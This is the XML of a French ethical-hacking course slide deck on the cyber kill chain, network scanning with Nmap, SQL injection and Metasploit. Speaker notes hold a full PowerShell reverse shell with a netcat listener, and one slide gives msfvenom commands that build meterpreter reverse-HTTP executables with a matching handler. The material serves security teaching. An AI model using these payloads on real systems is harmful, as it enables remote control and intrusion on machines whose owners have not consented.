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63"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="374" r:id="rId3"/>
    <p:sldId id="316" r:id="rId4"/>
    <p:sldId id="317" r:id="rId5"/>
    <p:sldId id="318" r:id="rId6"/>
    <p:sldId id="375" r:id="rId7"/>
    <p:sldId id="320" r:id="rId8"/>
    <p:sldId id="321" r:id="rId9"/>
    <p:sldId id="322" r:id="rId10"/>
    <p:sldId id="323" r:id="rId11"/>
    <p:sldId id="324" r:id="rId12"/>
    <p:sldId id="369" r:id="rId13"/>
    <p:sldId id="306" r:id="rId14"/>
    <p:sldId id="305" r:id="rId15"/>
    <p:sldId id="307" r:id="rId16"/>
    <p:sldId id="370" r:id="rId17"/>
    <p:sldId id="315" r:id="rId18"/>
    <p:sldId id="319" r:id="rId19"/>
    <p:sldId id="371" r:id="rId20"/>
    <p:sldId id="309" r:id="rId21"/>
    <p:sldId id="340" r:id="rId22"/>
    <p:sldId id="314" r:id="rId23"/>
    <p:sldId id="312" r:id="rId24"/>
    <p:sldId id="341" r:id="rId25"/>
    <p:sldId id="342" r:id="rId26"/>
    <p:sldId id="326" r:id="rId27"/>
    <p:sldId id="335" r:id="rId28"/>
    <p:sldId id="332" r:id="rId29"/>
    <p:sldId id="333" r:id="rId30"/>
    <p:sldId id="336" r:id="rId31"/>
    <p:sldId id="334" r:id="rId32"/>
    <p:sldId id="373" r:id="rId33"/>
    <p:sldId id="337" r:id="rId34"/>
    <p:sldId id="338" r:id="rId35"/>
    <p:sldId id="343" r:id="rId36"/>
    <p:sldId id="344" r:id="rId37"/>
    <p:sldId id="345" r:id="rId38"/>
    <p:sldId id="346" r:id="rId39"/>
    <p:sldId id="347" r:id="rId40"/>
    <p:sldId id="348" r:id="rId41"/>
    <p:sldId id="349" r:id="rId42"/>
    <p:sldId id="350" r:id="rId43"/>
    <p:sldId id="351" r:id="rId44"/>
    <p:sldId id="352" r:id="rId45"/>
    <p:sldId id="353" r:id="rId46"/>
    <p:sldId id="354" r:id="rId47"/>
    <p:sldId id="355" r:id="rId48"/>
    <p:sldId id="372" r:id="rId49"/>
    <p:sldId id="356" r:id="rId50"/>
    <p:sldId id="357" r:id="rId51"/>
    <p:sldId id="358" r:id="rId52"/>
    <p:sldId id="359" r:id="rId53"/>
    <p:sldId id="360" r:id="rId54"/>
    <p:sldId id="361" r:id="rId55"/>
    <p:sldId id="362" r:id="rId56"/>
    <p:sldId id="363" r:id="rId57"/>
    <p:sldId id="364" r:id="rId58"/>
    <p:sldId id="365" r:id="rId59"/>
    <p:sldId id="366" r:id="rId60"/>
    <p:sldId id="367" r:id="rId61"/>
    <p:sldId id="368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99" autoAdjust="0"/>
    <p:restoredTop sz="68421" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="78" d="100"/>
          <a:sy n="78" d="100"/>
        </p:scale>
        <p:origin x="2400" y="90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C78748-AD0C-4E67-8AB1-6D283CC586E6}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>23/01/2025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C3CEAE-FE3F-41DF-A495-685CEF8738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9477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SQRIkSj-6g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youtube.com/watch?v=Zj_7Wunnu2w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vshells.com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magit.fr/definition/Antivirus-anti-malware" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.lemagit.fr/definition/UBA%20(User%20Behavior%20analytics)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lemagit.fr/definition/Chiffrement" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.lemagit.fr/definition/Systeme-de-detection-dintrusions" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.lemagit.fr/definition/Pare-feu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S%C3%A9curit%C3%A9_informatique" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fr.wikipedia.org/wiki/Exploit_(informatique)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fr.wikipedia.org/wiki/Correctif" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fr.wikipedia.org/wiki/Vuln%C3%A9rabilit%C3%A9_informatique" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fr.wikipedia.org/wiki/Vuln%C3%A9rabilit%C3%A9_zero-day#cite_note-GDT-1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4882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3981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74999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46843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5192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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=9SQRIkSj-6g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=Zj_7Wunnu2w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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C3AD6-069E-4418-80E4-9BD64100A970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56406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hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>Liens 1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hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=ujpscX1KB5M</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Liens 2 : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.revshells.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Machine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 10 : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -W </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>noni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>ep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> bypass -c "$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>TCPClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> = New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Net.Sockets.TCPClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>(‘192.168.19.134', </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>9001);$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>NetworkStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>TCPClient.GetStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>();$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>StreamWriter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> = New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>IO.StreamWriter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>NetworkStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>);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WriteToStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> ($String) {[byte[]]$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>script:Buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> = 0..$TCPClient.ReceiveBufferSize | % {0};$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>StreamWriter.Write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>($String + 'SHELL&gt; ');$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>StreamWriter.Flush</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>()}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>WriteToStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> '';</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>while</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>BytesRead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>NetworkStream.Read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>($Buffer, 0, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Buffer.Length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>)) -gt 0) {$Command = ([</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>text.encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>]::UTF8).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>GetString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>($Buffer, 0, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>BytesRead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> - 1);$Output = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Invoke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>-Expression $Command 2&gt;&amp;1 | Out-String} catch {$_ | Out-String}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>WriteToStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> ($Output)}$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>StreamWriter.Close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>()" 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Machine kali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nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> –v –l –p 9001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 9001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C3AD6-069E-4418-80E4-9BD64100A970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55397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48643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0026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Phase reconnaissance : analyse d’attaque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Phase exploitation : attaque proprement dit (experience et connaissance des noms d’attaques ou exploit)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Les CVE – les hackers opportunistes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Zero days  - La veille au zero days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Phase post-exploitation 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Priv esc (overflow pour s’integrer au noyeau)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LoL : Living of land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Pivoting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Backdooring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Une plateforme de protection des terminaux (ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="1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Endpoint Protection Platform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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, EPP) est une technologie de sécurité qui protège les dispositifs terminaux (serveurs et postes de travail, notamment, tels que les ordinateurs de bureau et ordinateurs portables).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="fr-FR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Une EPP combine plusieurs technologies de protection des terminaux en un système de sécurité consolidé. Les EPP incluent généralement des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3D73AD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>antimalwares</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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, des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3D73AD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>pare-feu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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, des systèmes de prévention des intrusions (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3D73AD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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), le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3D73AD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>chiffrement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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 des données et l’analyse comportementale (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3D73AD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>UEBA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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). Ces capacités permettent de surveiller, contrôler et sécuriser les terminaux sur l’ensemble du réseau d’une organisation.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23118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Dans le domaine de la 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3" tooltip="Sécurité informatique"/>
              </a:rPr>
              <a:t>sécurité informatique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une </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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faille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/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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vulnérabilité </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1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zero-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1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day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— également orthographiée </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1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0-day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— ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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faille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/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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vulnérabilité du jour zéro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" u="none" strike="noStrike" baseline="30000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4"/>
              </a:rPr>
              <a:t>1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est une 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5" tooltip="Vulnérabilité informatique"/>
              </a:rPr>
              <a:t>vulnérabilité informatique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n'ayant fait l'objet d'aucune publication ou n'ayant aucun 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6" tooltip="Correctif"/>
              </a:rPr>
              <a:t>correctif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connu. L'existence d'une telle faille sur un produit informatique implique qu'aucune protection n'existe, qu'elle soit palliative ou définitive.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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 terminologie « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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zero-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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day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» ne qualifie pas la gravité de la faille. Comme toute vulnérabilité, sa gravité dépend de l'importance des dégâts pouvant être occasionnés, et de l'existence d'un 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7" tooltip="Exploit (informatique)"/>
              </a:rPr>
              <a:t>exploit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c'est-à-dire d'une technique « exploitant » cette faille afin de conduire des actions indésirables sur le produit concerné.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29440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47725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16012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78498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FE9FC-3B73-1F6E-05FC-E5EF35499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BAF614D-49EC-C05B-632A-F3AD3C6AB6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2752318-0346-BCBB-1058-0307B8266C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18C5BD-FF6D-C3A8-531A-DA5421C904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26035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61511-77B3-2B6A-DB8A-79D08D3FF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3AAFBD3-EEF4-7A0E-434D-FC27425FF7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4B0D2D1-28D2-5160-FFE6-6B499C30B0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9F76C3-7C3C-9471-8141-86B3A23FD1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43481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C10D8-BDBE-6A1C-AC97-80A7C6228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0CD9222-9547-5802-5231-84683EAE25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98A36A0-BDF0-6ACC-1C15-83AC34C4D2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1315350-3C8E-F89B-1F7A-A7D4A7B779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3579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E9DE7-5FE5-6D39-5EDD-EA24F0C67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A528BB8-B958-C50A-3305-F1001B2434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6726ED3-F8ED-4EC3-4153-0789481A89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33CB3F2-EE5D-A2C5-3C08-66A7469692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997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570C4-B50B-3FD8-B360-5854482B3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B96C2CC-1723-D09C-4103-1EA370FC7B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3F90FDA-6807-57C9-D78D-DD947CA900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77422DB-7058-6DDA-D496-12FD460C29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5239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7241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28712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85459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https://www.hackerprof.com/80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9752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1" name="Google Shape;511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https://www.youtube.com/watch?v=4t4kBkMsDbQ&amp;pp=ygUTbmV0d29ya2NodWNrICsgbm1hcA%3D%3D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Kit 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Nmap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Nscan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Zmap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Masscan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Ping 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ping 10.7.1.226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Nmap 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Finding host and scanning network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learning.oreilly.com/library/view/ceh-certified-ethical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1. check for live systems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sudo nmap -sP 10.7.1.0/24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2. check for open ports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(port 80, 443 for web)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sudo nmap -sT -p 80,443 10.7.1.0/24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 : for TCP using 3-way handshake (Full Open scan)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message 1 : i'm prot 443 Are you theire (SYN)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message 2 : yes i'm thiere, (SYN ACK)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message 3 : let's talk (ACK)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More detect by the IDS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3-way handshake without connection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sudo nmap -sS -p 80,443 10.7.1.0/24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 : Stealthy (half Open Scan)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(2way handshake)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sudo nmap -sT 10.7.1.226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filter by ip.addr eq 10.7.1.226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click one converstation and "apply this filter"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4. Perform banner grabbing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OS detection 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sudo nmap -sO 10.7.1.226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Mora options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sudo nmap -A 10.7.1.226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5. scan vulnerabilities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namp --script vuln 10.7.1.226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https://sectools.org/tag/vuln-scanners/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https://hassen-hannachi.medium.com/installing-openvas-on-kali-linux-a54baeaf806a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https://medium.com/@careertechnologymiraroad/openvas-scanner-fa518e9301f3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https://medium.com/@kennithlowy/installing-openvas-step-by-step-guide-0aa83239a34b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https://medium.com/@sonya.moisset/guide-de-s%C3%A9curit%C3%A9-pour-les-logiciels-open-source-meilleures-pratiques-pour-s%C3%A9curiser-vos-projets-c7ea78acb615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8" name="Google Shape;518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5" name="Google Shape;525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2" name="Google Shape;532;p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23/01/2025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540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23/01/2025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9998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23/01/2025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093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23/01/2025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3465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23/01/2025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2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23/01/2025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1094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23/01/2025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172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23/01/2025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8925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23/01/2025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280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D0F02E8-2F32-4935-B922-CE6A57C5DF1F}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>23/01/2025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0923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23/01/2025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0792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D0F02E8-2F32-4935-B922-CE6A57C5DF1F}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>23/01/2025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352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infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet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securebit/meterpreter-shell-as-a-32-64-bit-dll-2520604e41f6" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/dejisec/8cdc3398610d1a0a91d01c9e1fb02ea1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A46F80-C0A2-26B5-15A8-DE179D93C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1094720" cy="4839668"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr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Ethical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hacking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CyberKillChain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Attaques/Attaquants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342519A-6409-79E9-E000-0170265010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8485" y="4563122"/>
            <a:ext cx="9959966" cy="1035498"/>
          </a:xfrm>
        </p:spPr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47935435-D877-73BB-E95C-404780BAD02C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="527116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Dr. Rakotondramanana Radiarisainana Sitraka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033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8664558" cy="467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Times New Roman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SQL Injection (1)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="550" name="Google Shape;550;p6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11211" y="1681329"/>
            <a:ext cx="9205784" cy="4534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8664558" cy="467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Times New Roman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SQL Injection (2)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="556" name="Google Shape;556;p69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557" name="Google Shape;557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57" y="1075623"/>
            <a:ext cx="8664558" cy="5782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B7E563-DEE6-9356-EC47-7766A460E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Metasploit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977DD1-14D9-469A-5C8C-0AF02E4EB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9B397A6-C467-C621-6E8E-E12909AF0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1845734"/>
            <a:ext cx="5187378" cy="375187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C871982-3442-EB61-9444-F8AD861E6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1577159"/>
            <a:ext cx="472440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19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72936B-A6D9-B3B0-D9E6-FDDB230C2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53157"/>
            <a:ext cx="11353800" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr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msfconsole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pour la version console de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metasploit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E7E82B-BE01-3248-3FF1-A1E97CA1E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Auxilliary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Outil de scan tel que le port d’une machine  cible, ou encore d’un service.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Tapez : show ???</a:t>
            </a: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: outil permet l’accès à des donnés confidentiel des identifiants ou des mots de passe de service ou d’application, le post-exploitation vient après l’exploitation</a:t>
            </a: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654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72936B-A6D9-B3B0-D9E6-FDDB230C2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53157"/>
            <a:ext cx="11353800" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr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msfconsole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pour la version console de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metasploit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E7E82B-BE01-3248-3FF1-A1E97CA1E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 : code d’exploitation par lequel un attaquant profitera d’un défaut système. On utilise un exploit d’une application ou d’un service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utilisera un exploit pour attaquer une machine de façon à lui produire un résultat que les développeurs n’aurait pas envisager voir même anticiper. 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Tapez : show exploits</a:t>
            </a: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264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72936B-A6D9-B3B0-D9E6-FDDB230C2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53157"/>
            <a:ext cx="11353800" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr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msfconsole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pour la version console de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metasploit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E7E82B-BE01-3248-3FF1-A1E97CA1E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175" y="2150076"/>
            <a:ext cx="11489725" cy="53663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Encoders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Outils qui permettent de dissimuler des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payloads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ou des exploits ou les deux combinés  en créant des couches sélectionnées par l’attaquant selon le système qui est utilisé sur la machine cible.</a:t>
            </a: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Payload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code que l’attaque souhaite exécuté sur la machine cible. Par exemple un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revese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shell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qui crée une connexion distante depuis la machine cible vers l’attaquant. C’est la machine cible qui se connecte à la machine de l’attaquant. Il y a certain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payload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d’un exploit qui engendre aussi un RCE (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Remote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Execution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Nops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Un code qui permet de faire fonctionner un exploit ou un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payload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 une machine ou sur d’autres extension puis spécifique. (par exemple du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25071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E16BCD-2ABA-410A-270A-518D8C420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Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> et binding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6217474-9424-4872-12C8-D0954E4F5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38E8A6F-2CD1-5090-3DC7-9A7FA84B1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45734"/>
            <a:ext cx="8133217" cy="428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569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C89363-D0CC-0AE5-BFBA-56B195B91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443" y="-553839"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Msfvnom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> en local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AFE092-BB01-E6CE-FBA2-83C4C9217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931" y="108943"/>
            <a:ext cx="11557772" cy="6155933"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR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Utiliser ifconfig pour trouver l’adresse IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR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Generer puis lancer le programme malvaillant sur le client (commande en un ligne) : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR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msfvenom -p windows/meterpreter/reverse_http -a x86 –platform windows -f exe LHOST=192.168.113.133 LPORT=80 -o /home/kali/Desktop/something32.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR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msfvenom -p windows/x64/meterpreter/reverse_http -a x64 –platform windows -f exe LHOST=192.168.113.133 LPORT=80 -o /home/kali/Desktop/something32.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" sz="1800" b="1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Changer droit pour être copié après : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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777 /home/kali/Desktop/something32.exe</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1800" b="1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Créer le programme d’ecoute (search + use peut être aussi utilisé)  :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR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exploit/multi/handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR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payload windows/meterpreter/reverse_http</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
